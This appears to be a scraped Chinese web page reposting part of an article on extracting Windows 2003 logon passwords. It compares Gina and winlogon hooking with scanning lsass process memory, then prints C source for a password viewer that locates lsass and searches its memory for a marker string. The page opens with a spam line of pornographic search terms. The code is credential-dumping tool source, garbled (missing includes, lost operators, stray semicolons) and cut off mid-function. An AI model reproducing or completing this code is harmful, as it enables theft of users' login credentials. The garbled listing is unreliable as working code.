日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

  1. 首頁(yè) > 云知道 > >

在win 2003中得到登陸密碼( 二 )

云知道


【在win 2003中得到登陸密碼】無(wú)論怎說(shuō),三種方法中,最穩(wěn)定,最安全的方法還是使用Gina那種方法.Hijack了winlogn一些API的方法,畢竟是改動(dòng)了系統(tǒng)的東西,對(duì)系統(tǒng)的穩(wěn)定性來(lái)說(shuō),會(huì)有考驗(yàn),直接搜索lsass進(jìn)程內(nèi)存的方法呢,雖說(shuō)也是困難,但準(zhǔn)確性,成功率卻又是低 。
下面的代碼使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass內(nèi)存中"LocalSystem Remote Procedure"這個(gè)字符串,因?yàn)樵谙喈?dāng)多的測(cè)試中,密碼都是保存在有這個(gè)字符串的地址后一點(diǎn)的位置中,當(dāng)然了,很多系統(tǒng)并沒(méi)有這個(gè)字符串,或者就算有,我們得到的都是錯(cuò)誤的密碼 。
代碼: //********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User PassWord On 2003 Box,The Method
//; Used Is Pretty Unwise,But This May Be The Only Way To RevIEw The
//; Logon User"s Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC6.0
//********************************************************************************
#include
#include
#include
#define BaseAddress 0x002b5000;;;;;// The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable
char; Password[MAX_PATH] =// Store The Found Password
// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL; FindPassword(DWORD PID);
intSearch(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL; Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDropnn");
if (!Is2003());;;;;// Check Out If The Box Is 2003
{
printf("The Program Can"t Only Run On Windows 2003 Platformn");
return -1;
}
PID = GetLsassPID() // Get The Lsass.exe PID
if (PID == 0);;;;;// Fail To Get PID If Returning Zerom
{
return -1;
}
FindPassword(PID) // Find The Password From Lsass.exe Memory
return 0;
}
// End main()
//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:;;
//In: char *Buffer;;;;;--> The Memory Buffer To Search;;;;
//; Out: const UINT nSize--> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
//;;;;Since The Password Is Near The Above Location,But It"s Not Always True That
//;;;;We Will Find The Magic String,Or Even We Find It,The Password May Be Located
//;;;;At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i)
{
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
*/
if (Buffer == "L")
{
OffSet = 0;
if (strnicmp(&Buffer[iOffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet= strlen("LocalSystem")1;
if (strnicmp(&Buffer[iOffSet],"Remote",strlen("Remote")) == 0)
{
OffSet= strlen("Remote")1;
if (strnicmp(&Buffer[iOffSet],"Procedure",strlen("Procedure")) == 0)

推薦閱讀